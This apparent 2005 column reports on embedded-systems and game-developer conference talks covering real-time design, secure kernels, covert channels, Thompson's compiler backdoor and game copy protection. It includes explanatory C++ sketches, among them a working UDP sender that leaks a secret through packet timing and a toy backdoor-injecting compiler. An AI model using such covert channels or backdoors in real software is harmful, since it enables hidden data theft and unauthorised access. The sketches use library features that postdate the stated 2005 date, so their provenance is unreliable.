


July, 2005: Embedded Systems And Games

Ed's an EE, PE, and author in Poughkeepsie, NY. Contact him at [email protected] with "Dr Dobbs" in the subject to avoid spam filters.


Let's start with a quiz. For each pair of lecture titles, decide which you'd prefer to attend:

  • "Basic Control Theory for the Software Engineer" or "Why You Should Have Paid Attention in Multivariate Calculus"
  • "The Joy of Real-Time Artificial Intelligence" or "Sexuality in Games: When is it Appropriate?"

Huh. Me, too.

This past March, I attended both the Embedded Systems Conference and the Game Developers Conference to see what's interesting and useful. I hadn't known the GDC was running just down the street, but once I found out, I couldn't pass up the opportunity.

Although the GDC had much better snackage, there were remarkable overlaps between the two. Here's a look at some interesting topics presented at the conferences...

Hardware Linkages

The single, critical, defining feature of embedded software is its intimate relation with the underlying hardware. Unlike in ordinary IT-style applications programs, the exact details of I/O ports, system features, and CPU timings loom large in embedded programs. While such details can be muffled by layers of software, the fact that each embedded system is different poses significant challenges.

Michael Anderson of the PTR Group described what's involved in "Migrating from a Legacy RTOS to Embedded Linux." Contrary to popular opinion, Linux seems to be consuming the in-house RTOS kernel end of the market rather than commercial RTOS sales, but you can tell the RTOS vendors feel the winds of change blowing through their customer base.

He observes that universities are turning out Linux-experienced programmers with lots of Java smarts, but without the least hint of embedded programming or RTOS experience. Worse, students have never learned the art of postmortem debugging ("Core dump?"), don't understand that hardware isn't just an always-reliable layer in the functional decomposition, and may never have experienced the challenges of cross-platform programming.

For example, at the IT-app (and, necessarily, Java) level, memory is a vast expanse of identical words that can be accessed without regard to the underlying hardware. The notion that reading memory incurs a finite delay that depends on whether accessing another variable has prefilled or flushed a data cache line comes as a shock.
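Neither speaker showed code, but a minimal C++ sketch makes the point; the array size and the timing scaffolding here are my own choices, not anything from the talk. Both loops do identical arithmetic, yet the second one touches a new cache line on nearly every read and typically runs several times slower:

    #include <chrono>
    #include <cstddef>
    #include <cstdio>
    #include <vector>

    // Same work, different access order: the row-major pass reuses each cache
    // line it fetches, the column-major pass does not, and the difference
    // shows up directly in the run time.
    int main() {
        const std::size_t N = 4096;
        std::vector<int> a(N * N, 1);
        long long sum = 0;

        auto t0 = std::chrono::steady_clock::now();
        for (std::size_t row = 0; row < N; ++row)
            for (std::size_t col = 0; col < N; ++col)
                sum += a[row * N + col];        // walks along cache lines
        auto t1 = std::chrono::steady_clock::now();
        for (std::size_t col = 0; col < N; ++col)
            for (std::size_t row = 0; row < N; ++row)
                sum += a[row * N + col];        // jumps to a new line each read
        auto t2 = std::chrono::steady_clock::now();

        using us = std::chrono::microseconds;
        std::printf("row-major %lld us, column-major %lld us (sum %lld)\n",
                    (long long)std::chrono::duration_cast<us>(t1 - t0).count(),
                    (long long)std::chrono::duration_cast<us>(t2 - t1).count(),
                    sum);
    }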

Anderson pointed out that another factor limiting responsiveness is whether a task switch has recently flushed the Translation Lookaside Buffer (TLB) inside the CPU. The TLB speeds up the translation from virtual to physical addresses by memorizing the end result of the numerous memory accesses required to set up the mapping, a process that depends on the virtual memory context of the task. A system doing many task switches flushes its TLBs so frequently that the walk-the-tables time affects the overall performance.

That bit of esoterica constrains the overall architecture of a real-time system, because threads share the virtual-memory context of the task that contains them: switching among threads within one task leaves the TLB intact, while switching between tasks flushes it. Building a multitasking system on tasks seems like it ought to be about the same as building one on threads, but the memory access patterns are completely different. As a result, memory performance for thread-based applications is generally much better than for task-based applications.

Isolating hardware within software abstractions is an IT-app dogma that doesn't work as well in embedded systems as it should, because embedded programs have dependencies on system aspects that simply don't appear in models developed for pure-software IT applications. Mark Gerhardt and Doug Locke, of TimeSys and Locke Consulting, respectively, described the pitfalls in "Refocusing Object-Oriented Tools for Real-Time Designs."

Their example of a software-based alarm clock showed all the usual interface specifications, from which you could certainly develop programs to both implement and use the clock. However, the clock actually spends most of its time in a state not covered by the interface specifications—running quietly, ticking off seconds.

The usual interface-centric decomposition completely misses nearly all of the clock's activity, simply because the interfaces aren't involved. Any specification omitting such a vital part of the clock's design isn't adequate to the task, which is more-or-less the state of current design tools. IT-level design largely assumes that objects (the clock) remain unchanged until activated by an API interaction.

They allow that further decomposition would detail those internal functions, but the clock's API design provides no way for external programs and users to take into account the clock's internal actions, which are assumed to be irrelevant for external users. That's true for IT-style programs and utterly false for embedded programs.

Suppose that an API function controls the clock's resolution by adjusting the tick rate. Although it's obvious that a clock ticking off seconds will burn fewer CPU cycles than a microsecond-ticking one, the API specification has no place for that side effect. Witness a classic real-time bug: Changing one parameter here mysteriously causes a timing failure in a seemingly unrelated part of the system there.
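Their alarm clock wasn't presented as code, but a hypothetical C++ interface along these lines shows the blind spot. Everything an outside caller can see is below; the tick that consumes most of the clock's life, and whose rate the resolution setter silently changes, is invisible. The class and method names are my own invention, not from the talk:

    #include <chrono>

    // Hypothetical interface, not from the talk: the public face of the clock.
    class AlarmClock {
    public:
        void setAlarm(unsigned hour, unsigned minute);
        void cancelAlarm();
        unsigned currentHour() const;
        unsigned currentMinute() const;

        // Looks like a harmless configuration call, but it changes how often
        // the private tick() below runs -- and therefore how many CPU cycles
        // the clock steals from the rest of the system. Nothing in the
        // signature admits to that side effect.
        void setResolution(std::chrono::microseconds tick_period);

    private:
        // Runs from a periodic timer; this is where the clock spends nearly
        // all of its time, and it appears nowhere in the interface above.
        void tick();
    };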

What's needed are dependency and timing charts that relate all the various tasks and functions, so that you can see which resources are in short supply. Fitting that into the standard software-development methodology can be difficult if you don't expect any problems, which seems to be the typical starting point for most developers and projects.

Information Security

Suppose that you manage to finish a small embedded systems project and release it to the world. Typically, what happens next is that folks use it, and ideally, buy lots of it. Few people care that a microcontroller runs their lamp switch and rarely does anyone hack it into doing something else.

The more capable processors found in larger projects present tempting targets, although the damage is generally limited to a single system. Even if your customer does something weird with your hardware, it might not matter as long as he and all his friends buy bunches of it: There's a thriving aftermarket of hacks for the Linksys WRT54x routers that treat them as general-purpose 200-MHz MIPS embedded systems.

Arun Subbarao of Lynuxworks presented a "Technology Overview of Secure Embedded Operating Systems," with an emphasis on large-scale projects using high-value data with stringent security requirements. The central problem is that embedded systems tend to work with real-time data that cannot be backed up and processed after a system failure, so the design must withstand attacks that corrupt or deny access to that data.

Security must be built-in during the design phase by anticipating attacks and defining policies that limit their effects. Obviously, you should know your attackers and think like they do, a difficult task for designers just trying to make the system work in the first place.

Bill Beckwith and Joseph Jacob (both from Objective Interface Systems) and Mark Vanfleet (from the NSA) described "Security for Safety Critical Distributed Embedded Systems." Basically, if you're building a secure system, you must begin from a provably secure basis: Secure layers atop an insecure base have no security at all.

They described a technique called "Multiple Independent Levels of Security" that's espoused by the NSA for high-reliability secure systems. MILS starts with a provably correct 4-KLOC microkernel running on secured hardware, then isolates chunks of functionality within separate partitions having carefully defined interfaces and a complete lack of side-channel communication. Even device drivers run in user mode to prevent system-wide corruption.

They contend that Moore's Law has invalidated the conventional wisdom that mandatory isolation incurs a severe performance penalty. A task-switching overhead that approached 100 percent in the early '90s is now 1 percent and falling; only our assumptions haven't kept pace. While that may be true for assumptions, perhaps our expectations rise even faster than the performance improvements, as witness the earlier threads-versus-tasks-versus-TLB discussion.

They do admit the difficulty of predicting attacks that can leak information from a secure system. For example, an attacker can insert code that subtly alters the timing of network packets sent to the outside world. The packet data remains unchanged and the IP addresses are always correct, but the transmission timing encodes whatever information the attacker wants. In fact, packet timing can survive passage through firewalls and VPNs on its way to the outside world, where it can be monitored en passant with little risk of detection.
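Here's a minimal sketch of that kind of timing channel, entirely my own illustration rather than anything shown in the session; the port, address, and message are placeholders. The payload and headers are innocuous, and the secret rides only in the gaps between packets:

    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <unistd.h>
    #include <chrono>
    #include <string>
    #include <thread>

    // Leak one bit per packet: a '1' stretches the inter-packet gap, a '0'
    // doesn't. Anyone inspecting the packets sees ordinary traffic; anyone
    // timing them can read the message.
    int main() {
        int s = socket(AF_INET, SOCK_DGRAM, 0);
        sockaddr_in dst{};
        dst.sin_family = AF_INET;
        dst.sin_port = htons(9999);                      // placeholder port
        inet_pton(AF_INET, "192.0.2.1", &dst.sin_addr);  // documentation address

        const std::string secret = "hi";
        const char payload[] = "routine status report";

        for (unsigned char byte : secret) {
            for (int bit = 7; bit >= 0; --bit) {
                sendto(s, payload, sizeof payload, 0,
                       reinterpret_cast<const sockaddr*>(&dst), sizeof dst);
                auto gap = ((byte >> bit) & 1) ? std::chrono::milliseconds(80)
                                               : std::chrono::milliseconds(20);
                std::this_thread::sleep_for(gap);
            }
        }
        close(s);
    }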

As an aside, they observe that you cannot trust a VPN built on Windows, because you cannot trust any Windows software. Linux isn't much better, if only because far too much stuff happens in kernel mode, outside the normal security constraints.

Ken Thompson's notorious UNIX backdoor served as an example of why you cannot trust large-scale programs, either. Basically, Thompson created a tampered version of the Standard C compiler binary that recognized when it was compiling itself from untampered source and reinserted the tampered code. That code also recognized when the compiler processed the UNIX login command's source code and inserted binary code that accepted a fixed password known only to Thompson.
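Thompson's actual hack lived inside the C compiler's code generator, which obviously doesn't fit here; the toy below is only a schematic of the trick, with string matching standing in for real compilation and every name invented. The two if-blocks are the whole idea: one plants the backdoor, the other makes the tampering self-perpetuating.

    #include <iostream>
    #include <string>

    // Toy model, not Thompson's code: "compiling" is just string pass-through,
    // but the two pattern matches show the shape of the attack.
    std::string compile(const std::string& source) {
        std::string object_code = source;   // pretend this is code generation

        // Case 1: compiling login -- quietly accept a master password.
        if (source.find("check_password(") != std::string::npos)
            object_code += "\n/* injected */ if (pw == \"thompson\") return OK;";

        // Case 2: compiling the compiler from clean source -- re-insert this
        // very logic, so the tampering survives every rebuild.
        if (source.find("std::string compile(") != std::string::npos)
            object_code += "\n/* injected */ /* ...both if-blocks above... */";

        return object_code;
    }

    int main() {
        std::cout << compile("int login() { return check_password(user); }") << '\n';
    }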

No amount of source-code scrutiny will reveal the existence of a self-reproducing tampered binary, so creating a secure system must begin with bootstrapping all the tools from provably secure binaries.

Gotcha!

Copy Protection Redux

Cracking an embedded program provides access to either the underlying hardware or the data, so that compromising the program is a means to an end rather than an end in itself. Cracking game programs, on the other hand, has become something of a team sport, with little object beyond simply cracking the code; the fact that others subsequently use the game for free seems to be regarded as a side effect.

Andres Torrubia presented "Inside the Hacker Mind" at GDC, describing the infrastructure created by the folks who penetrate game security. Much as Bill Gatliff observed at ESC/Boston, you must assume that the attackers are at least as smart as you are, have access to better tools, and have all the time and motivation in the world.

The current state of the art defeats most copy protection in less than 24 hours. That's one day from the initial release of a game on CD to the time a cracked version appears on the usual assortment of shady FTP sites. The cracked version may include a sort of reverse copy protection that masks the cracking technique and impedes the vendor's ability to protect the next CD version.

The groups doing the cracking run the games in virtual machines, both commercial and homebrew, with cloaked debuggers to step through the code. Having many eyes look at the problem works just as well in this situation as it does for debugging ordinary code.

Steven Davis from ITGlobalSecure and Rob Ellison from Macromedia presented "HackU: Beat the Hackers at Their Own Game." It was well attended, despite being scheduled against a GDC keynote address, demonstrating that many attendees have a strong need-to-know.

They start by assuming that attackers know the entire structure of both the program and its copy protection, which is a refreshing change from the usual security-by-obscurity mindset. The goal is simply to delay the eventual crack long enough to recoup the money that justifies producing the game in the first place; they admit no game can be protected forever.

Wrapping copy protection around a program doesn't work, because once the crackers get an unwrapped executable image in memory, they simply save it to a file. That kind of wrapper falls within the standard 24 hours and, in their view, isn't worth the effort.

The Macrovision technique is scarily simple: Replace all the integer constants in your C++ source with methods that return the same numeric value after some function-call hocus-pocus, with the side effect that not calling the procedures prevents the program from running. Interleaving copy protection with procedural code makes the copy protection very difficult to remove, while exacting only a "small" runtime performance penalty.
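They didn't hand out source, so the fragment below is only my guess at the flavor of it; the names and the arithmetic are invented. The visible literal 3 disappears, and the only way to get it back at run time is through a call that also happens to verify the media:

    #include <cstdlib>

    // Hypothetical reconstruction of the constant-replacement idea: stand-in
    // names and deliberately trivial "hocus-pocus".
    static bool disc_check_passed() {
        return true;   // placeholder for the real media/license verification
    }

    int protected_constant(int seed) {
        int value = (seed ^ 0x5A) - 7;     // the real transform would be far
                                           // less obvious than this
        if (!disc_check_passed())
            value ^= 0xFF;                 // quietly corrupt the result
        return value;
    }

    int main() {
        int lives = protected_constant(0x50);   // works out to 3; the literal 3
                                                // never appears in the source
        return (lives == 3) ? EXIT_SUCCESS : EXIT_FAILURE;
    }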

Removing or bypassing all those function calls takes two to four weeks of tedious effort and quality control, starting from initial CD availability. They find that the first crack takes 21 days, averaged across the dozen or so games and subsequent patches released so far, and a month is as long as you can expect.

Their surveys show that 75 percent of a game's potential customers would buy it within a month, if the appearance of a cracked version hadn't tempted them to steal it. About 42 percent of all game owners possess cracked games and 40 percent have more than 15 cracked games. I have my doubts about their survey methodology and suspect "collectors" with many cracked games skew the numbers, but let's run with it anyway.

Delaying the first crack by a month might, possibly, recover much of the revenue lost to cracked games. Someone in the audience asked if they had any data on their protected games to demonstrate that, but it seems there are too few games protected by their method to produce any numbers they'd like to mention. That's significant, I think.

They regard protecting console game systems as a lost cause, as the hardware is cracked within, at most, a few months. After that, the only recourse is to kick cracked boxes off the interactive network gaming servers.

The message for embedded-systems folks should be obvious. When an attacker owns the hardware, whether that's a device or a CD, they also own the code inside. Not even highly motivated and well-funded copy protection, even if you pronounce it "security," can change that result.

Reentry Checklist

Oh, yeah, about that sexuality thing. The highly pneumatic females prominently featured in the game ads festooning the GDC lobby indicate, at least to me, that sex in games is a grafted-on attractant, just like the lovingly detailed explosions. One participant suggested a video game for sex-education classes, which sounds like an interesting, albeit doomed, project.

The Embedded Systems Conference is at http://www.esconline.com/. The Game Developers Conference is at http://gdconf.com/. You'll find links to the companies on those sites.

An interesting review of 40 years of developer techniques is at http://www.ics.uci.edu/~ses/papers/hist.pdf. They observe, although not in these words, the high truth that Dilbert is a documentary.

Ken Thompson's description of his C-compiler Trojan is at http://www.acm.org/classics/sep95/. The Jargon File's "back door" entry is at http://www.catb.org/~esr/jargon/html/B/back-door.html. Remember that this happened in the Good Old Days, before such a stunt would be construed as a terrorist act.

Various CMP divisions run the Embedded Systems and Game Developers Conferences, publish the DDJ and Game Developer magazines, and paid my way at the conferences. With that in mind, I just report on what I saw.

DDJ

